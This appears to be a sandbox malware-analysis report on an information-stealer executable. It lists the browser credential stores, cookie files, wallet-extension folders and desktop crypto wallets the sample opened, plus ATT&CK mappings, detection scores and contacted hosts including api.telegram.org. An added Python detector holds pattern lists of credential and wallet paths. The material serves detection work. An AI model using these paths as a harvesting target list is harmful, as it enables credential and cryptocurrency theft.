            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkk
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\icmkfkmjoklfhlfdkkkgpnpldkgdmhoe
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafch
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhl
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\cookies.sqlite
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegll
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmnded
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\admmjipmmciaobhojoghlmleefbicajgJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklbJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
            Source: Yara matchFile source: Process Memory Space: 765iYbgWn9.exe PID: 1996, type: MEMORYSTR
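The rows above are the behaviour artifacts a detection engineer would turn into a rule: a non-browser process opening browser credential stores (Chrome "Login Data", Firefox key4.db), the 32-letter extension vaults under Local Extension Settings (where wallet browser extensions keep their data), and desktop wallet directories (Electrum, Exodus, Coinomi, Atomic, Guarda). A second, less obvious signal is the sweep: the process probes "Login Data" in many unrelated profile subfolders (shared_proto_db, WebStorage, Sessions, coupon_db and so on), something a browser never does. The following is an added example, not Joe Sandbox code and not taken from the sample, that parses rows in the report's "Source … File opened …" format and scores each process on both signals. The sample events, the pattern lists, the browser allow-list and the verdict rule are constructed assumptions of this example.

```python
"""Triage sandbox 'File opened' events for credential- and wallet-theft behaviour.

Added example; not Joe Sandbox code. The sample events are constructed to
mirror the rows above, and the category patterns, the browser allow-list
and the verdict rule are this example's own assumptions.
"""
import ntpath
import re
from collections import Counter, defaultdict

# Row shape of the report; \s* also accepts the fused "....exeFile opened:"
# form that the HTML extraction produces.
EVENT_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.exe)\s*File opened:\s*(?P<path>.+?)\s*$", re.I)

CATEGORIES = {                     # assumed patterns; extend from your own telemetry
    "browser_credential_store": [
        r"\\Login Data$", r"\\key4\.db$", r"\\logins\.json$", r"\\Cookies$"],
    "browser_extension_storage": [
        # Chrome extension IDs are 32 letters from a-p; wallet extensions keep
        # their vault under Local Extension Settings\<id>.
        r"\\Local Extension Settings\\[a-p]{32}$"],
    "crypto_wallet": [
        r"\\Electrum\\wallets\\?$", r"\\exodus\\exodus\.wallet\\?$",
        r"\\Coinomi\\Coinomi\\wallets\\?$",
        r"\\(atomic|Guarda)\\Local Storage\\leveldb\\?$"],
}
COMPILED = {c: [re.compile(p, re.I) for p in ps] for c, ps in CATEGORIES.items()}

# Processes expected to open their own credential stores (assumed list).
BROWSER_PROCS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}


def classify(path):
    """Return the category a path falls into, or None."""
    for cat, regexes in COMPILED.items():
        if any(r.search(path) for r in regexes):
            return cat
    return None


def triage(lines):
    """Aggregate events per process and apply the stealer heuristic."""
    state = defaultdict(lambda: {"hits": Counter(), "login_data_dirs": set()})
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue                                   # not a file-open row
        proc, path = m["proc"], m["path"]
        cat = classify(path)
        if cat:
            state[proc]["hits"][cat] += 1
        if path.lower().endswith("\\login data"):
            state[proc]["login_data_dirs"].add(ntpath.dirname(path).lower())
    verdicts = {}
    for proc, rec in state.items():
        hits = rec["hits"]
        is_browser = ntpath.basename(proc).lower() in BROWSER_PROCS
        creds = hits["browser_credential_store"]
        loot = hits["crypto_wallet"] + hits["browser_extension_storage"]
        # A browser opens 'Login Data' in its profile root only; a stealer
        # that walks the profile tree probes it in many unrelated folders.
        sweep = len(rec["login_data_dirs"]) >= 3
        verdicts[proc] = {
            "hits": dict(hits),
            "login_data_dirs": len(rec["login_data_dirs"]),
            "sweep": sweep,
            "stealer_like": (not is_browser) and creds > 0 and (loot > 0 or sweep),
        }
    return verdicts


# Constructed sample modelled on the report's rows; the chrome.exe row is a
# benign control that opens its own store in the profile root.
STEALER = "C:\\Users\\user\\Desktop\\765iYbgWn9.exe"
CHROME = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
PROFILE = "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
ROAMING = "C:\\Users\\user\\AppData\\Roaming"


def _ev(proc, path):
    return f"Source: {proc} File opened: {path}"


SAMPLE_EVENTS = [
    _ev(STEALER, PROFILE + "\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),
    _ev(STEALER, PROFILE + "\\databases\\Login Data"),
    _ev(STEALER, PROFILE + "\\shared_proto_db\\Login Data"),
    _ev(STEALER, PROFILE + "\\WebStorage\\Login Data"),
    _ev(STEALER, ROAMING + "\\Mozilla\\Firefox\\Profiles\\v6zchhhv.default-release\\key4.db"),
    _ev(STEALER, ROAMING + "\\Electrum\\wallets\\"),
    _ev(STEALER, ROAMING + "\\exodus\\exodus.wallet\\"),
    _ev(CHROME, PROFILE + "\\Login Data"),
    "Source: Yara match File source: sslproxydump.pcap, type: PCAP",  # ignored
]

if __name__ == "__main__":
    for proc, verdict in triage(SAMPLE_EVENTS).items():
        print(f"{proc}: {verdict}")
```

The verdict deliberately requires a credential-store open plus either wallet/extension loot or a sweep, so a single backup tool touching "Login Data" does not fire; the browser allow-list should be keyed on signed image path in production rather than on basename, which a stealer can trivially spoof.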

Remote Access Functionality

Source: Yara match | File source: 765iYbgWn9.exe, type: SAMPLE
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 0.0.765iYbgWn9.exe.7ff6a5820000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: Process Memory Space: 765iYbgWn9.exe PID: 1996, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic column, techniques in the report's row order; the digits preceding a technique are the count badges the report shows for matched techniques, reproduced as extracted)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 31 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 DLL Side-Loading; Steganography; Compile After Delivery
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 21 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 22 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 2 Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Web Service; 1 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Initial sample
Source | Detection | Scanner | Label
765iYbgWn9.exe | 50% | ReversingLabs | Win64.Trojan.Barys
765iYbgWn9.exe | 32% | Virustotal |
No Antivirus matches
No Antivirus matches

Domains
Source | Detection | Scanner
ipwho.is | 0% | Virustotal
api.telegram.org | 2% | Virustotal

URLs
Source | Detection | Scanner | Label
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://docs.rs/getrandom#nodejs-es-module-supportC: | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://www.w3.or | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Virustotal |
https://duckduckgo.com/ac/?q= | 0% | Virustotal |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal |
http://ns.adobe. | 0% | Avira URL Cloud | safe
https://docs.rs/getrandom#nodejs-es-module-supportC: | 0% | Virustotal |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ipwho.is | 195.201.57.90 | true | false | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation

https://ac.ecosia.org/autocomplete?q=
  Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp; 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
http://www.w3.or
  Source: 765iYbgWn9.exe
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://duckduckgo.com/chrome_newtab
  Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp; 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | 0%, Virustotal; Avira URL Cloud: safe | Reputation: unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
  Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp; 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | 0%, Virustotal; Avira URL Cloud: safe | Reputation: unknown
https://docs.rs/getrandom#nodejs-es-module-supportC:
  Source: 765iYbgWn9.exe
  Malicious: false | 0%, Virustotal; Avira URL Cloud: safe | Reputation: unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
